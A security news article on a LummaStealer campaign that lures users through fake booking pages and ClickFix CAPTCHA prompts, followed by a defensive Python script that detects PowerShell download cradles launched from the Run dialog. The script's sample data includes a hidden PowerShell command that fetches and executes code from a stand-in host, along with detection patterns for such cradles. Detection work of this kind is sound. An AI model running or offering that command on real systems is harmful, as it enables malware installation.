A recent cyber attack has been uncovered, leveraging fake booking websites to distribute the LummaStealer malware.
This sophisticated campaign exploits users’ trust in legitimate booking platforms by employing fake CAPTCHA prompts, a technique known as ClickFix, to trick victims into executing malicious commands on their systems.
The attack begins with a phishing email or link that redirects users to a fake booking confirmation page, which appears legitimate due to its HTTPS connection and resemblance to well-known booking sites like Booking.com.
Infection Chain and Techniques
The infection process involves multiple stages. Initially, users are directed to a fake payment confirmation URL, which then leads to a booking itinerary page with a CAPTCHA verification prompt.
This prompt instructs users to open the Windows Run dialog and paste and execute a PowerShell command; because the victim runs the command by hand, no exploit is needed and antivirus detection is bypassed.
The command is placed in the clipboard by an obfuscated JavaScript routine, which is itself decoded from a ROT13-encoded PHP script.
This script is part of a larger social engineering tactic designed to deceive users into compromising their own systems.
Once executed, the PowerShell command downloads and executes the LummaStealer payload from a fake booking website URL.
Notably, the malware samples involved in this campaign are significantly larger than previous versions, often disguised as legitimate installers to evade detection.
According to G Data, these larger files use techniques like binary padding to delay analysis and trigger file size limitations in security tools.
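The endpoint side of the ClickFix chain described above leaves two traces a defender can check: a PowerShell process whose parent is explorer.exe (the Run dialog launches through Explorer) with a download-and-execute command line, and the same command recorded in the user's RunMRU registry key. The following is an added example written for this article, not code from the original report or from G Data; the telemetry and registry values are constructed samples, and the field names mirror Sysmon process-creation events.

```python
"""Flag ClickFix-style executions: PowerShell spawned from the Run dialog
(parent explorer.exe) with a download-and-execute command line, plus the
matching entries in HKCU\\...\\Explorer\\RunMRU. Constructed sample data."""
import re

# Constructed process-creation events modelled on Sysmon Event ID 1 fields.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": 'powershell -w hidden -c "iwr https://booking-example.invalid/x | iex"'},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Program Files\Vendor\agent.exe",          # benign: management agent
     "CommandLine": "powershell -File C:\\scripts\\inventory.ps1"},
    {"Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\explorer.exe",                     # benign: plain Run command
     "CommandLine": "cmd /c dir"},
]

# Constructed RunMRU values; Windows stores each entry with a trailing "\1".
SAMPLE_RUNMRU = {
    "a": 'powershell -w hidden -c "iwr https://booking-example.invalid/x | iex"\\1',
    "b": "notepad\\1",
    "MRUList": "ab",
}

# A hit needs BOTH a fetch indicator and an execute/hide indicator, which keeps
# ordinary admin one-liners out of the alert stream.
DOWNLOAD = re.compile(r"(iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|"
                      r"downloadfile|webclient|https?://)", re.IGNORECASE)
EXECUTE = re.compile(r"(\biex\b|invoke-expression|-enc(odedcommand)?\b|"
                     r"-w(indowstyle)?\s+hidden|\bmshta\b)", re.IGNORECASE)


def is_clickfix_process(event):
    """True when PowerShell is launched from Explorer with a download cradle."""
    image = event["Image"].lower()
    parent = event["ParentImage"].lower()
    if not image.endswith(("powershell.exe", "pwsh.exe")):
        return False
    if not parent.endswith("explorer.exe"):      # Run dialog => parent is explorer.exe
        return False
    cmd = event["CommandLine"]
    return bool(DOWNLOAD.search(cmd) and EXECUTE.search(cmd))


def suspicious_runmru(values):
    """Return RunMRU commands (trailing '\\1' stripped) that look like a cradle."""
    hits = []
    for name, raw in values.items():
        if name == "MRUList":
            continue
        cmd = raw[:-2] if raw.endswith("\\1") else raw
        if DOWNLOAD.search(cmd) and EXECUTE.search(cmd):
            hits.append(cmd)
    return hits


def scan(events=SAMPLE_EVENTS, runmru=SAMPLE_RUNMRU):
    """Run both checks and return the flagged command lines."""
    return {"process_hits": [e["CommandLine"] for e in events if is_clickfix_process(e)],
            "runmru_hits": suspicious_runmru(runmru)}
```

On a live host the RunMRU values come from `HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU`, and the process telemetry from Sysmon or an EDR; the two checks together tie a suspicious PowerShell launch to a user-typed Run command, which is the ClickFix signature.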
Global Impact
LummaStealer, operating under a Malware-as-a-Service (MaaS) model, has been observed targeting users globally, with cases reported in countries such as the Philippines and Germany.
This malware was initially spread through platforms like GitHub and Telegram but has now shifted to exploiting booking websites and malvertising.
The campaign’s global scope and evolving tactics suggest a growing threat landscape, with parallels to the infamous Emotet banking trojan in terms of versatility and prevalence.
As cybersecurity threats continue to evolve, vigilance from both security researchers and users is crucial to mitigate these risks.
The use of sophisticated social engineering techniques like ClickFix and the adaptation of malware to evade detection highlight the need for enhanced security measures and awareness about phishing scams and malicious campaigns.